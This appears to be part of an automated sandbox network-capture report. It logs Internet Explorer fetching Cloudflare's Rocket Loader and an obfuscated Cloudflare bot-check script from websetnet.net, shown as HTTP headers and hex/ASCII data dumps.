                                                                                              Date: Mon, 13 Dec 2021 23:57:52 GMT
                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              x-frame-options: DENY
                                                                                              x-content-type-options: nosniff
                                                                                              x-xss-protection: 1;mode=block
                                                                                              cache-control: public, max-age=1801
                                                                                              CF-Cache-Status: HIT
                                                                                              Age: 24
                                                                                              Last-Modified: Mon, 13 Dec 2021 23:57:28 GMT
                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 6bd323247a2e4eb6-FRA
                                                                                              2021-12-13 23:57:52 UTC8949INData Raw: 33 64 0d 0a 44 41 54 41 3a 7b 33 44 32 42 30 44 30 43 30 37 37 31 45 45 35 36 43 31 41 37 38 30 45 46 31 33 3a 33 42 33 30 33 46 34 35 3a 44 42 37 42 38 41 43 41 30 41 33 41 45 41 30 35 33 39 7d 0d 0a
                                                                                              Data Ascii: 3dDATA:{3D2B0D0C0771EE56C1A780EF13:3B303F45:DB7B8ACA0A3AEA0539}
                                                                                              2021-12-13 23:57:52 UTC8949INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              4192.168.2.349760104.26.9.138443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-12-13 23:57:32 UTC8207OUTGET /cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: websetnet.net
                                                                                              Connection: Keep-Alive
                                                                                              2021-12-13 23:57:32 UTC8207INHTTP/1.1 200 OK
                                                                                              Date: Mon, 13 Dec 2021 23:57:32 GMT
                                                                                              Content-Type: application/javascript
                                                                                              Content-Length: 12332
                                                                                              Connection: close
                                                                                              Last-Modified: Wed, 08 Dec 2021 16:45:16 GMT
                                                                                              ETag: "61b0e11c-302c"
                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vayQamAhmgh0qGgc5DTtwy%2B4ic9ttvWyR1G9DyHYiAv1YRzjfZERZI14eYMDk8bmAzi%2BQTIu4P%2FnZ8CK3rLxqJ7PE38tOpTC4xgyEg%2BNOWJ%2BoZ7mOpn2ykHCmqW8aCM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 6bd322a48d202c56-FRA
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Expires: Wed, 15 Dec 2021 23:57:32 GMT
                                                                                              Cache-Control: max-age=172800
                                                                                              Cache-Control: public
                                                                                              Accept-Ranges: bytes
                                                                                              2021-12-13 23:57:32 UTC8208INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 72 65 74 75 72 6e 22 63 66 2d 6d 61 72 6b 65 72 2d 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2e 74 6f 53 74 72 69 6e 67 28 29 2e 73 6c 69 63 65 28 32 29 7d 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 65 3d 30 3b 65 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 74 5b 65 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 65 5d 3b 28 6e 3d 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 7c 7c 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 29 2e 63 61 6c 6c 2e 61 70 70 6c 79 28 6e 2c 5b 63 6f 6e 73 6f 6c 65 2c 22 5b 52 4f 43 4b 45 54 20 4c 4f 41 44 45 52 5d 20 22 5d 2e 63 6f 6e 63 61 74 28 74 29 29 3b 76 61 72 20 6e 7d 66 75 6e 63
                                                                                              Data Ascii: !function(){"use strict";function t(){return"cf-marker-"+Math.random().toString().slice(2)}function e(){for(var t=[],e=0;e<arguments.length;e++)t[e]=arguments[e];(n=console.warn||console.log).call.apply(n,[console,"[ROCKET LOADER] "].concat(t));var n}func
                                                                                              2021-12-13 23:57:32 UTC8209INData Raw: 20 66 28 74 29 7b 69 66 28 74 26 26 22 68 61 6e 64 6c 65 45 76 65 6e 74 22 69 6e 20 74 29 7b 76 61 72 20 65 3d 74 2e 68 61 6e 64 6c 65 45 76 65 6e 74 3b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 3f 65 2e 62 69 6e 64 28 74 29 3a 65 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 68 28 74 2c 65 2c 6e 29 7b 76 61 72 20 72 3d 6e 3f 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 74 2c 6e 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 3b 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 74 29 2e 66 6f 72 45 61 63 68 28 72 29 7d 66 75 6e 63 74 69 6f 6e 20 76 28 29
                                                                                              Data Ascii: f(t){if(t&&"handleEvent"in t){var e=t.handleEvent;return"function"==typeof e?e.bind(t):e}return t}function h(t,e,n){var r=n?function(t){return e.insertBefore(t,n)}:function(t){return e.appendChild(t)};Array.prototype.slice.call(t).forEach(r)}function v()
                                                                                              2021-12-13 23:57:32 UTC8211INData Raw: 63 65 3a 74 2c 62 6c 6f 63 6b 69 6e 67 3a 21 31 2c 64 6f 63 57 72 69 74 65 53 69 6d 75 6c 61 74 6f 72 3a 6e 2c 63 61 6c 6c 62 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 5f 63 66 52 4c 55 6e 62 6c 6f 63 6b 48 61 6e 64 6c 65 72 73 3d 21 30 2c 72 2e 72 65 6d 6f 76 65 50 72 65 6c 6f 61 64 48 69 6e 74 73 28 29 2c 50 28 74 29 7d 7d 29 3b 72 2e 69 6e 73 65 72 74 50 72 65 6c 6f 61 64 48 69 6e 74 73 28 29 2c 4d 2e 72 75 6e 4f 6e 4c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 2e 72 75 6e 28 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 50 28 74 29 7b 76 61 72 20 65 3d 6e 65 77 20 4f 28 74 29 3b 4d 2e 73 69 6d 75 6c 61 74 65 53 74 61 74 65 42 65 66 6f 72 65 44 65 66 65 72 53 63 72 69 70 74 73 41 63 74 69 76 61 74 69 6f 6e 28 29 2c 65 2e 68 61
                                                                                              Data Ascii: ce:t,blocking:!1,docWriteSimulator:n,callback:function(){window.__cfRLUnblockHandlers=!0,r.removePreloadHints(),P(t)}});r.insertPreloadHints(),M.runOnLoad(function(){r.run()})}function P(t){var e=new O(t);M.simulateStateBeforeDeferScriptsActivation(),e.ha
                                                                                              2021-12-13 23:57:32 UTC8212INData Raw: 68 3e 30 7d 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 70 6f 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 74 65 6d 73 2e 70 6f 70 28 29 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6f 72 45 61 63 68 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 68 69 73 2e 69 74 65 6d 73 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 73 63 72 69 70 74 3b 72 65 74 75 72 6e 20 74 28 6e 29 7d 29 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 72 76 65 73 74 53 63 72 69 70 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 74 68 69 73 2c 72 3d 65 2e 66 69 6c 74 65 72 2c 6f 3d 65 2e 6d 75 74 61 74 65
                                                                                              Data Ascii: h>0},enumerable:!0,configurable:!0}),t.prototype.pop=function(){return this.items.pop()},t.prototype.forEach=function(t){this.items.forEach(function(e){var n=e.script;return t(n)})},t.prototype.harvestScripts=function(t,e){var n=this,r=e.filter,o=e.mutate
                                                                                              2021-12-13 23:57:32 UTC8213INData Raw: 66 75 6e 63 74 69 6f 6e 28 74 29 7b 65 2e 69 73 50 65 6e 64 69 6e 67 44 65 66 65 72 53 63 72 69 70 74 28 74 29 26 26 65 2e 6d 61 6b 65 4e 6f 6e 45 78 65 63 75 74 61 62 6c 65 28 74 29 7d 7d 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 63 72 65 61 74 65 50 6c 61 63 65 68 6f 6c 64 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 43 6f 6d 6d 65 6e 74 28 74 2e 6f 75 74 65 72 48 54 4d 4c 29 7d 2c 65 7d 28 44 29 2c 4f 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 3d 74 26 26 74 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7c 7c 74 68 69 73 7d 72 65 74 75 72 6e 20 79 28 65 2c 74 29 2c 65 2e 70 72 6f 74 6f 74 79
                                                                                              Data Ascii: function(t){e.isPendingDeferScript(t)&&e.makeNonExecutable(t)}})},e.prototype.createPlaceholder=function(t){return document.createComment(t.outerHTML)},e}(D),O=function(t){function e(){return null!==t&&t.apply(this,arguments)||this}return y(e,t),e.prototy
                                                                                              2021-12-13 23:57:32 UTC8215INData Raw: 66 65 72 2b 22 3c 2f 68 65 61 64 3e 22 2c 6f 3d 74 2e 70 61 72 73 65 46 72 6f 6d 53 74 72 69 6e 67 28 65 2c 22 74 65 78 74 2f 68 74 6d 6c 22 29 3b 69 66 28 74 68 69 73 2e 73 63 72 69 70 74 53 74 61 63 6b 2e 68 61 72 76 65 73 74 53 63 72 69 70 74 73 41 66 74 65 72 44 6f 63 57 72 69 74 65 28 6f 29 2c 6e 28 6f 2e 68 65 61 64 2e 63 68 69 6c 64 4e 6f 64 65 73 2c 74 68 69 73 2e 69 6e 73 65 72 74 69 6f 6e 50 6f 69 6e 74 4d 61 72 6b 65 72 29 2c 6f 2e 62 6f 64 79 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 29 7b 66 6f 72 28 76 61 72 20 69 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 6f 2e 62 6f 64 79 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 61 3d 74 68 69 73 2e 69 6e 73 65 72 74 69 6f 6e 50 6f 69 6e 74 4d 61 72 6b 65
                                                                                              Data Ascii: fer+"</head>",o=t.parseFromString(e,"text/html");if(this.scriptStack.harvestScriptsAfterDocWrite(o),n(o.head.childNodes,this.insertionPointMarker),o.body.childNodes.length){for(var i=Array.prototype.slice.call(o.body.childNodes),a=this.insertionPointMarke
                                                                                              2021-12-13 23:57:32 UTC8216INData Raw: 63 68 61 6e 67 65 22 29 2c 74 68 69 73 2e 70 72 6f 78 79 49 6e 6c 69 6e 65 48 61 6e 64 6c 65 72 28 77 69 6e 64 6f 77 2c 22 6f 6e 6c 6f 61 64 22 29 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 26 26 74 68 69 73 2e 70 72 6f 78 79 49 6e 6c 69 6e 65 48 61 6e 64 6c 65 72 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2c 22 6f 6e 6c 6f 61 64 22 29 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 73 69 6d 75 6c 61 74 65 53 74 61 74 65 42 65 66 6f 72 65 44 65 66 65 72 53 63 72 69 70 74 73 41 63 74 69 76 61 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 62 79 70 61 73 73 45 76 65 6e 74 73 49 6e 50 72 6f 78 69 65 73 3d 21 30 2c 74 68 69 73 2e 73 69 6d 75 6c 61 74 65 64 52 65 61 64 79 53 74 61 74 65 3d 22 69 6e 74 65 72 61 63 74 69 76 65 22 2c 6c 28 64 6f 63 75 6d
                                                                                              Data Ascii: change"),this.proxyInlineHandler(window,"onload"),document.body&&this.proxyInlineHandler(document.body,"onload")},t.prototype.simulateStateBeforeDeferScriptsActivation=function(){this.bypassEventsInProxies=!0,this.simulatedReadyState="interactive",l(docum
                                                                                              2021-12-13 23:57:32 UTC8217INData Raw: 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 6e 5b 6f 2d 32 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6f 5d 3b 76 61 72 20 69 3d 65 26 26 65 2e 5f 5f 72 6f 63 6b 65 74 4c 6f 61 64 65 72 50 72 6f 78 69 65 64 48 61 6e 64 6c 65 72 7c 7c 65 3b 72 2e 63 61 6c 6c 2e 61 70 70 6c 79 28 72 2c 5b 74 68 69 73 2c 74 2c 69 5d 2e 63 6f 6e 63 61 74 28 6e 29 29 7d 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 70 72 6f 78 79 49 6e 6c 69 6e 65 48 61 6e 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 74 72 79 7b 76 61 72 20 6e 3d 74 5b 65 5d 3b 69 66 28 6e 26 26 21 6e 2e 5f 5f 72 6f 63 6b 65 74 4c 6f 61 64 65 72 49 6e 6c 69 6e 65 48 61 6e 64 6c 65 72 50 72 6f 78 79 29 7b 76 61 72 20 72 3d 74 68 69 73 3b 74 5b 65 5d 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66
                                                                                              Data Ascii: rguments.length;o++)n[o-2]=arguments[o];var i=e&&e.__rocketLoaderProxiedHandler||e;r.call.apply(r,[this,t,i].concat(n))}},t.prototype.proxyInlineHandler=function(t,e){try{var n=t[e];if(n&&!n.__rocketLoaderInlineHandlerProxy){var r=this;t[e]=function(t){if
                                                                                              2021-12-13 23:57:32 UTC8219INData Raw: 20 6e 3d 65 2e 73 65 74 74 69 6e 67 73 2e 64 6f 63 57 72 69 74 65 53 69 6d 75 6c 61 74 6f 72 2c 72 3d 65 2e 73 63 72 69 70 74 53 74 61 63 6b 2e 70 6f 70 28 29 3b 6e 26 26 21 72 2e 61 73 79 6e 63 26 26 6e 2e 65 6e 61 62 6c 65 28 72 2e 70 6c 61 63 65 68 6f 6c 64 65 72 29 3b 76 61 72 20 6f 3d 65 2e 61 63 74 69 76 61 74 65 53 63 72 69 70 74 28 72 29 3b 72 65 74 75 72 6e 20 6f 3f 72 2e 65 78 74 65 72 6e 61 6c 26 26 72 2e 65 78 65 63 75 74 61 62 6c 65 26 26 21 72 2e 61 73 79 6e 63 3f 28 75 28 6f 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 66 69 6e 61 6c 69 7a 65 41 63 74 69 76 61 74 69 6f 6e 28 72 29 2c 74 2e 72 75 6e 28 29 7d 29 2c 7b 76 61 6c 75 65 3a 76 6f 69 64 20 30 7d 29 3a 76 6f 69 64 20 65 2e 66 69 6e 61 6c 69 7a 65 41 63 74 69 76 61 74 69 6f 6e 28 72 29
                                                                                              Data Ascii: n=e.settings.docWriteSimulator,r=e.scriptStack.pop();n&&!r.async&&n.enable(r.placeholder);var o=e.activateScript(r);return o?r.external&&r.executable&&!r.async?(u(o,function(){t.finalizeActivation(r),t.run()}),{value:void 0}):void e.finalizeActivation(r)
                                                                                              2021-12-13 23:57:32 UTC8220INData Raw: 2e 22 29 7d 28 29 7d 28 29 3b 0a
                                                                                              Data Ascii: .")}()}();


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              5192.168.2.349761104.26.9.138443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-12-13 23:57:32 UTC8220OUTGET /cdn-cgi/bm/cv/669835187/api.js HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: websetnet.net
                                                                                              Connection: Keep-Alive
                                                                                              2021-12-13 23:57:32 UTC8221INHTTP/1.1 200 OK
                                                                                              Date: Mon, 13 Dec 2021 23:57:32 GMT
                                                                                              Content-Type: text/javascript
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              cache-control: max-age=604800, public
                                                                                              x-content-type-options: nosniff
                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=accSoL7JI0fvfVbHPAr9IbOepWt2uVnoWo2yDKGqC%2Fc4Cq%2BmgbXwKUn19FR9yh8NVKUGI5t7OdEgfl3qQTHkCsGxTwcvvrMZ0dUBEqD7vAHpAkid4A5bVG8mvxFScAM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 6bd322a5482c693d-FRA
                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                              2021-12-13 23:57:32 UTC8222INData Raw: 37 64 30 38 0d 0a 2f 2a 2a 0a 20 2a 20 40 6c 69 63 65 6e 73 65 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 35 20 41 6e 64 72 c3 a9 20 43 72 75 7a 20 3c 61 6d 64 66 63 72 75 7a 40 67 6d 61 69 6c 2e 63 6f 6d 3e 0a 20 2a 20 50 65 72 6d 69 73 73 69 6f 6e 20 69 73 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 2c 20 66 72 65 65 20 6f 66 20 63 68 61 72 67 65 2c 20 74 6f 20 61 6e 79 20 70 65 72 73 6f 6e 20 6f 62 74 61 69 6e 69 6e 67 20 61 20 63 6f 70 79 20 6f 66 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 61 6e 64 20 61 73 73 6f 63 69 61 74 65 64 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 20 66 69 6c 65 73 20 28 74 68 65 20 27 53 6f 66 74 77 61 72 65 27 29 2c 20 74 6f 20 64 65 61 6c 20 69 6e 20 74 68 65 20 53 6f 66 74 77 61 72 65 20 77 69 74 68
                                                                                              Data Ascii: 7d08/** * @license * Copyright (c) 2015 Andr Cruz <amdfcruz@gmail.com> * Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the 'Software'), to deal in the Software with
                                                                                              2021-12-13 23:57:32 UTC8222INData Raw: 6c 6c 20 63 6f 70 69 65 73 20 6f 72 20 73 75 62 73 74 61 6e 74 69 61 6c 20 70 6f 72 74 69 6f 6e 73 20 6f 66 20 74 68 65 20 53 6f 66 74 77 61 72 65 2e 0a 20 2a 20 54 48 45 20 53 4f 46 54 57 41 52 45 20 49 53 20 50 52 4f 56 49 44 45 44 20 27 41 53 20 49 53 27 2c 20 57 49 54 48 4f 55 54 20 57 41 52 52 41 4e 54 59 20 4f 46 20 41 4e 59 20 4b 49 4e 44 2c 20 45 58 50 52 45 53 53 20 4f 52 20 49 4d 50 4c 49 45 44 2c 20 49 4e 43 4c 55 44 49 4e 47 20 42 55 54 20 4e 4f 54 20 4c 49 4d 49 54 45 44 20 54 4f 20 54 48 45 20 57 41 52 52 41 4e 54 49 45 53 20 4f 46 20 4d 45 52 43 48 41 4e 54 41 42 49 4c 49 54 59 2c 20 46 49 54 4e 45 53 53 20 46 4f 52 20 41 20 50 41 52 54 49 43 55 4c 41 52 20 50 55 52 50 4f 53 45 20 41 4e 44 20 4e 4f 4e 49 4e 46 52 49 4e 47 45 4d 45 4e 54 2e
                                                                                              Data Ascii: ll copies or substantial portions of the Software. * THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
                                                                                              2021-12-13 23:57:32 UTC8224INData Raw: 23 46 46 34 44 34 44 27 2c 27 23 46 46 36 36 33 33 27 2c 27 23 46 46 46 46 39 39 27 2c 27 65 6c 6c 69 70 73 65 27 2c 27 23 45 36 33 33 31 41 27 2c 27 23 31 41 42 33 39 39 27 2c 27 6e 61 76 69 67 61 74 6f 72 27 2c 27 23 46 33 38 30 32 30 27 2c 27 6e 6f 77 27 2c 27 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 27 2c 27 61 76 61 69 6c 48 65 69 67 68 74 27 2c 27 2f 63 64 6e 2d 63 67 69 2f 62 6d 2f 63 76 2f 72 65 73 75 6c 74 3f 72 65 71 5f 69 64 3d 27 2c 27 41 72 72 61 79 42 75 66 66 65 72 27 2c 27 5f 5f 77 65 62 64 72 69 76 65 72 5f 65 76 61 6c 75 61 74 65 27 2c 27 70 75 73 68 27 2c 27 23 43 43 38 30 43 43 27 2c 27 23 45 36 36 36 42 33 27 2c 27 23 46 46 31 41 36 36 27 2c 27 68 61 73 68 42 69 6e 61 72 79 27 2c 27 23 42 33 33 33 30 30 27 2c 27 73 68 61 64 6f 77 43
                                                                                              Data Ascii: #FF4D4D','#FF6633','#FFFF99','ellipse','#E6331A','#1AB399','navigator','#F38020','now','defineProperty','availHeight','/cdn-cgi/bm/cv/result?req_id=','ArrayBuffer','__webdriver_evaluate','push','#CC80CC','#E666B3','#FF1A66','hashBinary','#B33300','shadowC
                                                                                              2021-12-13 23:57:32 UTC8225INData Raw: 72 74 73 27 5d 2c 5f 30 78 35 31 61 34 35 63 2c 5f 30 78 35 31 61 34 35 63 5b 61 30 5f 30 78 33 64 37 65 28 27 30 78 32 38 27 29 5d 2c 5f 30 78 32 62 66 66 63 62 29 2c 5f 30 78 35 31 61 34 35 63 5b 27 6c 27 5d 3d 21 30 78 30 2c 5f 30 78 35 31 61 34 35 63 5b 27 65 78 70 6f 72 74 73 27 5d 3b 7d 5f 30 78 32 62 66 66 63 62 5b 27 6d 27 5d 3d 5f 30 78 34 61 34 62 39 34 2c 5f 30 78 32 62 66 66 63 62 5b 27 63 27 5d 3d 5f 30 78 32 38 39 33 30 66 2c 5f 30 78 32 62 66 66 63 62 5b 27 64 27 5d 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 65 37 32 34 65 2c 5f 30 78 33 37 32 62 36 36 2c 5f 30 78 32 64 34 64 63 35 29 7b 5f 30 78 32 62 66 66 63 62 5b 27 6f 27 5d 28 5f 30 78 32 65 37 32 34 65 2c 5f 30 78 33 37 32 62 36 36 29 7c 7c 4f 62 6a 65 63 74 5b 61 30 5f 30 78 33 64 37
                                                                                              Data Ascii: rts'],_0x51a45c,_0x51a45c[a0_0x3d7e('0x28')],_0x2bffcb),_0x51a45c['l']=!0x0,_0x51a45c['exports'];}_0x2bffcb['m']=_0x4a4b94,_0x2bffcb['c']=_0x28930f,_0x2bffcb['d']=function(_0x2e724e,_0x372b66,_0x2d4dc5){_0x2bffcb['o'](_0x2e724e,_0x372b66)||Object[a0_0x3d7
                                                                                              2021-12-13 23:57:32 UTC8227INData Raw: 3b 7d 3b 72 65 74 75 72 6e 20 5f 30 78 32 62 66 66 63 62 5b 27 64 27 5d 28 5f 30 78 33 34 37 39 30 62 2c 27 61 27 2c 5f 30 78 33 34 37 39 30 62 29 2c 5f 30 78 33 34 37 39 30 62 3b 7d 2c 5f 30 78 32 62 66 66 63 62 5b 27 6f 27 5d 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 62 35 35 62 37 35 2c 5f 30 78 35 32 37 38 65 33 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 5b 61 30 5f 30 78 33 64 37 65 28 27 30 78 38 31 27 29 5d 5b 61 30 5f 30 78 33 64 37 65 28 27 30 78 34 37 27 29 5d 5b 61 30 5f 30 78 33 64 37 65 28 27 30 78 38 64 27 29 5d 28 5f 30 78 62 35 35 62 37 35 2c 5f 30 78 35 32 37 38 65 33 29 3b 7d 2c 5f 30 78 32 62 66 66 63 62 5b 27 70 27 5d 3d 27 27 2c 5f 30 78 32 62 66 66 63 62 28 5f 30 78 32 62 66 66 63 62 5b 27 73 27 5d 3d 30 78 35 29 3b 7d 28 7b 30 3a 66
                                                                                              Data Ascii: ;};return _0x2bffcb['d'](_0x34790b,'a',_0x34790b),_0x34790b;},_0x2bffcb['o']=function(_0xb55b75,_0x5278e3){return Object[a0_0x3d7e('0x81')][a0_0x3d7e('0x47')][a0_0x3d7e('0x8d')](_0xb55b75,_0x5278e3);},_0x2bffcb['p']='',_0x2bffcb(_0x2bffcb['s']=0x5);}({0:f
                                                                                              2021-12-13 23:57:32 UTC8228INData Raw: 30 78 35 31 32 33 66 36 3e 3e 3e 30 78 66 29 2b 5f 30 78 31 61 61 63 35 61 7c 30 78 30 29 26 5f 30 78 31 61 61 63 35 61 7c 7e 5f 30 78 35 31 32 33 66 36 26 5f 30 78 35 34 33 35 38 35 29 2b 5f 30 78 34 65 66 38 63 39 5b 30 78 33 5d 2d 30 78 33 65 34 32 33 31 31 32 7c 30 78 30 29 3c 3c 30 78 31 36 7c 5f 30 78 35 38 39 31 32 32 3e 3e 3e 30 78 61 29 2b 5f 30 78 35 31 32 33 66 36 7c 30 78 30 3b 5f 30 78 35 38 39 31 32 32 3d 28 28 5f 30 78 35 38 39 31 32 32 2b 3d 28 28 5f 30 78 35 31 32 33 66 36 3d 28 28 5f 30 78 35 31 32 33 66 36 2b 3d 28 28 5f 30 78 31 61 61 63 35 61 3d 28 28 5f 30 78 31 61 61 63 35 61 2b 3d 28 28 5f 30 78 35 34 33 35 38 35 3d 28 28 5f 30 78 35 34 33 35 38 35 2b 3d 28 5f 30 78 35 38 39 31 32 32 26 5f 30 78 35 31 32 33 66 36 7c 7e 5f 30 78 35
                                                                                              Data Ascii: 0x5123f6>>>0xf)+_0x1aac5a|0x0)&_0x1aac5a|~_0x5123f6&_0x543585)+_0x4ef8c9[0x3]-0x3e423112|0x0)<<0x16|_0x589122>>>0xa)+_0x5123f6|0x0;_0x589122=((_0x589122+=((_0x5123f6=((_0x5123f6+=((_0x1aac5a=((_0x1aac5a+=((_0x543585=((_0x543585+=(_0x589122&_0x5123f6|~_0x5
                                                                                              2021-12-13 23:57:32 UTC8229INData Raw: 7e 5f 30 78 35 34 33 35 38 35 26 5f 30 78 35 31 32 33 66 36 29 2b 5f 30 78 34 65 66 38 63 39 5b 30 78 64 5d 2d 30 78 32 36 37 38 65 36 64 7c 30 78 30 29 3c 3c 30 78 63 7c 5f 30 78 31 61 61 63 35 61 3e 3e 3e 30 78 31 34 29 2b 5f 30 78 35 34 33 35 38 35 7c 30 78 30 29 26 5f 30 78 35 34 33 35 38 35 7c 7e 5f 30 78 31 61 61 63 35 61 26 5f 30 78 35 38 39 31 32 32 29 2b 5f 30 78 34 65 66 38 63 39 5b 30 78 65 5d 2d 30 78 35 39 38 36 62 63 37 32 7c 30 78 30 29 3c 3c 30 78 31 31 7c 5f 30 78 35 31 32 33 66 36 3e 3e 3e 30 78 66 29 2b 5f 30 78 31 61 61 63 35 61 7c 30 78 30 29 26 5f 30 78 31 61 61 63 35 61 7c 7e 5f 30 78 35 31 32 33 66 36 26 5f 30 78 35 34 33 35 38 35 29 2b 5f 30 78 34 65 66 38 63 39 5b 30 78 66 5d 2b 30 78 34 39 62 34 30 38 32 31 7c 30 78 30 29 3c 3c
